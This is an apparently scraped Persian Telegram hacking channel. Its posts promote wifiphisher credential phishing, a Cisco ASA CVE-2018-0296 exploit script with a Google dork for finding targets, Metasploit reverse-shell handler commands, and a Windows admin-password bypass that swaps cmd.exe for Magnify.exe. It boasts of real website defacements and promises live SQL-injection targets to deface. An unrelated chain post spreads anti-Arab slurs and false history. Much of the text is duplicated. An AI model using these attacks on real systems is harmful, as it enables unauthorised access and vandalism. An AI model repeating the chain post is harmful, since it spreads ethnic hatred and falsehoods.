✔️ابزار wifiphisher برای تست و نفوذ وایرلس ها
Git: github.com/wifiphisher/wifiphisher.git
-عملکرد:)
Firmware Upgrade page
Network Manager connect
Browser plugin update
Oauth login Page
@LearnExploit
Git: github.com/wifiphisher/wifiphisher.git
-عملکرد:)
Firmware Upgrade page
Network Manager connect
Browser plugin update
Oauth login Page
@LearnExploit
توضیحات و نحوه ی نصب برنامه :
====$$=========$$======
توضیحات :
این ایکریپت همون طور که میدونید برای تست نفوذ به برناما های cisco نوشته شده.
این برنامه ها عبارت اند از :
3000 Series Industrial Security Appliance (ISA)
ASA 1000V Cloud Firewall
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4100 Series Security Appliance
Firepower 9300 ASA Security Module
FTD Virtual (FTDv)
=====$$$=======$$$====
نحوه ی نصب :
git clone https://github.com/yassineaboukir/CVE-2018-0296.git
بعد از دانلود وارد پوشه شده و تدمینال را فراخوانی کنید
نحوه ی استفاده :
python cisco_asa.py <URL>
===================
توجه این اسکریپ با ایکریپت بالا فرق داره ولی هر دو یه کارو انجام میدن پون ساده بود این و گذاشتم
Google Dork : /+CSCOE+/logon.html
موفق باشید.
~~~~~~~~~~~~~~~~~
#pentest #CisCo #ASA #FTP
#Dork #Google #Google_Dork
@LeaenExploit
====$$=========$$======
توضیحات :
این ایکریپت همون طور که میدونید برای تست نفوذ به برناما های cisco نوشته شده.
این برنامه ها عبارت اند از :
3000 Series Industrial Security Appliance (ISA)
ASA 1000V Cloud Firewall
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4100 Series Security Appliance
Firepower 9300 ASA Security Module
FTD Virtual (FTDv)
=====$$$=======$$$====
نحوه ی نصب :
git clone https://github.com/yassineaboukir/CVE-2018-0296.git
بعد از دانلود وارد پوشه شده و تدمینال را فراخوانی کنید
نحوه ی استفاده :
python cisco_asa.py <URL>
===================
توجه این اسکریپ با ایکریپت بالا فرق داره ولی هر دو یه کارو انجام میدن پون ساده بود این و گذاشتم
Google Dork : /+CSCOE+/logon.html
موفق باشید.
~~~~~~~~~~~~~~~~~
#pentest #CisCo #ASA #FTP
#Dork #Google #Google_Dork
@LeaenExploit
GitHub
GitHub - yassineaboukir/CVE-2018-0296: Script to test for Cisco ASA path traversal vulnerability (CVE-2018-0296) and extract system…
Script to test for Cisco ASA path traversal vulnerability (CVE-2018-0296) and extract system information. - yassineaboukir/CVE-2018-0296
👍1
پادشاه ایران
کوروش کبیر ما رو ببخش
من ایرانی
نیستم
چون بجای
درود
میگویم سلام و بجای بدرود
میگوییم
خداحافظ
من
ایرانی
نیستم چون روز کوروش بزرگ
را
نمیدانم (7 آبان ) چون این روز
فقط در
تقویم کشور من ثبت نشده
است
من ایرانی
نیستم
چون عربها
به من آموختند به خوراک
بگوییم
غذا،در حالی ک خودشان به
ادرار شتر
میگویند غذا و من هم
تکرار
میکنم
من
ایرانی
نیستم چون عربها به من
آموختند
برای شمارش خودمان بجای
تن از نفر
استفاده کنیم که واحد
شمارش
حیوانات است
من
ایرانی
نیستم چون عربها به من
آموختند
که بجای گفتن واق واق سگ
بگوییم
پارس که نام وطنمان است
من ایرانی
نیستم
چون عرب
ها به من آموختن دیوث یک
صفت زشت
است, در حالیکه نام یکی از
سرداران
ایرانی بوده که درحمله
اعراب به
ایران تعداد زیادی از
سربازان
عرب را به هلاکت رسانده
است
من
ایرانی
نیستم چون
اعراب بمن آموختند
بگویبم
شاهنامه آخرش خوش است چون
در آخر
شاهنامه ایرانیان از اعراب
شکست
میخورند
*
من
ایرانی
نیستم چون بجای نشر و کپی
این مطلب
بیخیال از کنار آن گذر
میکنم
عاشق این متنم... 👇
👈زمانی که عرب ملخ میخورد .... کورش به هرکس به اندازه خانواده اش گندم میداد ... ( یعنی عدالت )
👈زمانی که عرب در بیابان بز میچراند.... کورش نیمی از دنیا راگرفت....( یعنی حکومت )
👈زمانی که عرب دختر را ننگ میدانس .... کورش به بانوی ایرانى احترام میگذاشت ....
( یعنی مردم پرستی )
👈زمانی که عرب را " ام جهل" میخوادند ....
شاه کشور من اولین منشور حقوق بشررا نوشت..!!
( یعنی هنر )
👈زمانی که عرب چوب میپرستید ... کورش نیمی از دنیارا یکتا پرست کرد ... ( یعنی وحدت )
👈زمانی که عرب دخترش را زنده در گور میکرد .....
کورش بزرگ برای دختران پارس دانشگاه ساخت..!!!!!
( یعنی عشق )
👈زمانی که عرب در چادر بود ... کشور من تخت جمشید و پاسارگاد داشت..!! ( یعنی عظمت )
پس...بی غیرتی است که این پست در تمام دنیا پخش نشود...
کوروش کبیر ما رو ببخش
من ایرانی
نیستم
چون بجای
درود
میگویم سلام و بجای بدرود
میگوییم
خداحافظ
من
ایرانی
نیستم چون روز کوروش بزرگ
را
نمیدانم (7 آبان ) چون این روز
فقط در
تقویم کشور من ثبت نشده
است
من ایرانی
نیستم
چون عربها
به من آموختند به خوراک
بگوییم
غذا،در حالی ک خودشان به
ادرار شتر
میگویند غذا و من هم
تکرار
میکنم
من
ایرانی
نیستم چون عربها به من
آموختند
برای شمارش خودمان بجای
تن از نفر
استفاده کنیم که واحد
شمارش
حیوانات است
من
ایرانی
نیستم چون عربها به من
آموختند
که بجای گفتن واق واق سگ
بگوییم
پارس که نام وطنمان است
من ایرانی
نیستم
چون عرب
ها به من آموختن دیوث یک
صفت زشت
است, در حالیکه نام یکی از
سرداران
ایرانی بوده که درحمله
اعراب به
ایران تعداد زیادی از
سربازان
عرب را به هلاکت رسانده
است
من
ایرانی
نیستم چون
اعراب بمن آموختند
بگویبم
شاهنامه آخرش خوش است چون
در آخر
شاهنامه ایرانیان از اعراب
شکست
میخورند
*
من
ایرانی
نیستم چون بجای نشر و کپی
این مطلب
بیخیال از کنار آن گذر
میکنم
عاشق این متنم... 👇
👈زمانی که عرب ملخ میخورد .... کورش به هرکس به اندازه خانواده اش گندم میداد ... ( یعنی عدالت )
👈زمانی که عرب در بیابان بز میچراند.... کورش نیمی از دنیا راگرفت....( یعنی حکومت )
👈زمانی که عرب دختر را ننگ میدانس .... کورش به بانوی ایرانى احترام میگذاشت ....
( یعنی مردم پرستی )
👈زمانی که عرب را " ام جهل" میخوادند ....
شاه کشور من اولین منشور حقوق بشررا نوشت..!!
( یعنی هنر )
👈زمانی که عرب چوب میپرستید ... کورش نیمی از دنیارا یکتا پرست کرد ... ( یعنی وحدت )
👈زمانی که عرب دخترش را زنده در گور میکرد .....
کورش بزرگ برای دختران پارس دانشگاه ساخت..!!!!!
( یعنی عشق )
👈زمانی که عرب در چادر بود ... کشور من تخت جمشید و پاسارگاد داشت..!! ( یعنی عظمت )
پس...بی غیرتی است که این پست در تمام دنیا پخش نشود...
❤2👍2👎1
✔️ #دستورات لازم یک اکسپلویت هندلر
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_http
msf > set LHOST 192.168.181.128
msf > set LPORT 4444
msf > exploit
@LearnExploi
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_http
msf > set LHOST 192.168.181.128
msf > set LPORT 4444
msf > exploit
@LearnExploi
👍1
✔️ #دستور مهم ابزار nmap برای پیدا کردن آسیب پذیری مودم های adsl
nmap -sS -sV -vv -n -Pn -T5 192.168.1.1-255 -p80 -oG - | grep 'open'
@LearnExploit
nmap -sS -sV -vv -n -Pn -T5 192.168.1.1-255 -p80 -oG - | grep 'open'
@LearnExploit
✔️ چند تا از بهترین #اسکنر آسیب پذیری وبسایت ها
-> Nessus
-> Acunetix
-> Netsparker
-> Vega
-> wpscan(wordpress)
-> sqlmap
@LearnExploit
-> Nessus
-> Acunetix
-> Netsparker
-> Vega
-> wpscan(wordpress)
-> sqlmap
@LearnExploit
👍1
✔️ #عبور از پسورد ادمین ویندوزهای 7,8,10 با استفاده از Magnifier (ذربین ویندوز)
لازمه این کار: داشتن کالی لینوکس live روی usb یا dvd
-> ابتدا بالا اوردن لینوکس به صورت لایو
==================
-> رفتن به درایو ویندوز و پوشه System32
==================
-> پیدا کردن فایل Magnify.exe و تغییر نام این فایل به magnify.old
==================
-> پیدا کردن فایل cmd.exe و تغییر نام این فایل به magnify.exe
==================
-> خاموش کردن لینوکس و بالا اوردن ویندوز
==================
-> رفتن روی گزینه ease of access و ابزار magnify (ذربین)
==================
و در اخر میبینیم که محیط cmd بالا میاد..
==================
=> سپس با دستور net user میتوانیم پسورد ادمین را حذف کرده یا یک یوزر با قابلیت ادمین ایجاد کنیم.
-> برای تغییر پسورد از دستور زیر استفاده میکنیم:ِ
-> net user username new_password
-> برای اضافه کردن یوزر به گروه ادمین از دستور زیر استفاده میکنیم:
-> net localgroup administrators username /add
@LearnExploit
لازمه این کار: داشتن کالی لینوکس live روی usb یا dvd
-> ابتدا بالا اوردن لینوکس به صورت لایو
==================
-> رفتن به درایو ویندوز و پوشه System32
==================
-> پیدا کردن فایل Magnify.exe و تغییر نام این فایل به magnify.old
==================
-> پیدا کردن فایل cmd.exe و تغییر نام این فایل به magnify.exe
==================
-> خاموش کردن لینوکس و بالا اوردن ویندوز
==================
-> رفتن روی گزینه ease of access و ابزار magnify (ذربین)
==================
و در اخر میبینیم که محیط cmd بالا میاد..
==================
=> سپس با دستور net user میتوانیم پسورد ادمین را حذف کرده یا یک یوزر با قابلیت ادمین ایجاد کنیم.
-> برای تغییر پسورد از دستور زیر استفاده میکنیم:ِ
-> net user username new_password
-> برای اضافه کردن یوزر به گروه ادمین از دستور زیر استفاده میکنیم:
-> net localgroup administrators username /add
@LearnExploit
bandicam 2018-06-29 20-49-54-826.rar
6.8 MB
اموزش #دیفیس سایت با باگ #CSR
========
#Deface #Site #bug #CSR
0day.today
@LearnExploit
Pass : 0day.today
========
#Deface #Site #bug #CSR
0day.today
@LearnExploit
Pass : 0day.today
#Hacked By #X0P4SH4 | #R4diKall
Site #Defaced : http://www.oguori.com/
yon.ir/Iw73B
Our TM :
|~ X0P4SH4 - R4DiKaLL - UZiHacker - EvilBoy ~|
0Day.Today
other channel : @IRAN_SECURITY_TEAM
Site #Defaced : http://www.oguori.com/
yon.ir/Iw73B
Our TM :
|~ X0P4SH4 - R4DiKaLL - UZiHacker - EvilBoy ~|
0Day.Today
other channel : @IRAN_SECURITY_TEAM
برگزاری دوره آموزشی تابستانی کشف آسیب پذیری از اسکریپت های php :
قیمت دوره 85 هزار تومان میباشد.
برای شرکت در این دوره با تلگرام آیدی @WebServer در تماس باشید.
نصب ومپ سرور در ویندوز
نصب xampp در لینوکس
کامنت ها + نشان دادن خروجی به کاربر در php
متغیر ها + آرایه ها + ثابت ها در php
عبارات شرطی if + switch در php
حلقه while + for در php
توابع در php
بررسی include و require در php
بررسی متد POST و GET در php
ساخت فرم و ارسال و دریافت اطلاعات در php
کار با سشن ها در php
اتصال به دیتابیس در php
خواندن فایل ها از دیتابیس در php
حذف فایل ها از دیتابیس در php
بررسی آسیب پذیری RFI + نحوه رفع آسیب پذیری
بررسی آسیب پذیری LFI+ نحوه رفع آسیب پذیری
بررسی آسیب پذیری LFD + نحوه رفع آسیب پذیری
بررسی آسیب پذیری Insecure cookie handling+ نحوه رفع آسیب پذیری
بررسی آسیب پذیری SQLI + نحوه رفع آسیب پذیری
بررسی آسیب پذیری RCE+ نحوه رفع آسیب پذیری
بررسی آسیب پذیری XSS+ نحوه رفع آسیب پذیری
بررسی آسیب پذیری Authentication bypass+ نحوه رفع آسیب پذیری
بررسی آسیب پذیری Insecure Permissions+ نحوه رفع آسیب پذیری
بررسی آسیب پذیری CSRF+ نحوه رفع آسیب پذیری
قیمت دوره 85 هزار تومان میباشد.
برای شرکت در این دوره با تلگرام آیدی @WebServer در تماس باشید.
نصب ومپ سرور در ویندوز
نصب xampp در لینوکس
کامنت ها + نشان دادن خروجی به کاربر در php
متغیر ها + آرایه ها + ثابت ها در php
عبارات شرطی if + switch در php
حلقه while + for در php
توابع در php
بررسی include و require در php
بررسی متد POST و GET در php
ساخت فرم و ارسال و دریافت اطلاعات در php
کار با سشن ها در php
اتصال به دیتابیس در php
خواندن فایل ها از دیتابیس در php
حذف فایل ها از دیتابیس در php
بررسی آسیب پذیری RFI + نحوه رفع آسیب پذیری
بررسی آسیب پذیری LFI+ نحوه رفع آسیب پذیری
بررسی آسیب پذیری LFD + نحوه رفع آسیب پذیری
بررسی آسیب پذیری Insecure cookie handling+ نحوه رفع آسیب پذیری
بررسی آسیب پذیری SQLI + نحوه رفع آسیب پذیری
بررسی آسیب پذیری RCE+ نحوه رفع آسیب پذیری
بررسی آسیب پذیری XSS+ نحوه رفع آسیب پذیری
بررسی آسیب پذیری Authentication bypass+ نحوه رفع آسیب پذیری
بررسی آسیب پذیری Insecure Permissions+ نحوه رفع آسیب پذیری
بررسی آسیب پذیری CSRF+ نحوه رفع آسیب پذیری
👍1
#Hacked By #Uzi_Hacker | #X0P4Sh4 (Pasha) | #Evil_Boy
#Defaced Page in #Zone_H :
http://Zone-h.org/mirror/id/31432990
#Defaced Page in #Zone_H :
http://Zone-h.org/mirror/id/31432990
از فردا پیش به سوی اموزش باگ sql 😄❤️
دوستان بعد از اموزش برای شما تارگت هاییم در نظرگرفته میشه که اگه کسی برنده شد نامش در دیفیس های 0Day.Today قرار میگیره 😄❤️
/*/&/*/&/*/&/*/~~~~~
#Start #Bug #Sqli #X0P4Sh4 :)
《 @LearnExploit - 0Day.Today 》
دوستان بعد از اموزش برای شما تارگت هاییم در نظرگرفته میشه که اگه کسی برنده شد نامش در دیفیس های 0Day.Today قرار میگیره 😄❤️
/*/&/*/&/*/&/*/~~~~~
#Start #Bug #Sqli #X0P4Sh4 :)
《 @LearnExploit - 0Day.Today 》
Forwarded from Deleted Account
SQLi-P1.flv
26.3 MB
قسمت اول از اموزش باگ SQL
/*/&/*/&/*/&/*/~~~~
#Start #Bug #Sqli #Armia_Evil:)
《@LearnExploit-0Day.Today》
@LearnExploit
/*/&/*/&/*/&/*/~~~~
#Start #Bug #Sqli #Armia_Evil:)
《@LearnExploit-0Day.Today》
@LearnExploit
Forwarded from Deleted Account
SQLi-P2.flv
14.3 MB
قسمت دوم از اموزش باگ SQL
/*/&/*/&/*/&/*/~~~~
#Start #Bug #Sqli #Armia_Evil:)
《@LearnExploit-0Day.Today》
@LearnExploit
/*/&/*/&/*/&/*/~~~~
#Start #Bug #Sqli #Armia_Evil:)
《@LearnExploit-0Day.Today》
@LearnExploit
Forwarded from Deleted Account
SQLi-P3.flv
25.2 MB
قسمت سوم از اموزش باگ SQL
/*/&/*/&/*/&/*/~~~~
#Start #Bug #Sqli #Armia_Evil:)
《@LearnExploit-0Day.Today》
@LearnExploit
/*/&/*/&/*/&/*/~~~~
#Start #Bug #Sqli #Armia_Evil:)
《@LearnExploit-0Day.Today》
@LearnExploit
Forwarded from Deleted Account
SQLi-P4.flv
15.9 MB
قسمت چهارم از اموزش باگ SQL
/*/&/*/&/*/&/*/~~~~
#Start #Bug #Sqli #Armia_Evil:)
《@LearnExploit-0Day.Today》
@LearnExploit
/*/&/*/&/*/&/*/~~~~
#Start #Bug #Sqli #Armia_Evil:)
《@LearnExploit-0Day.Today》
@LearnExploit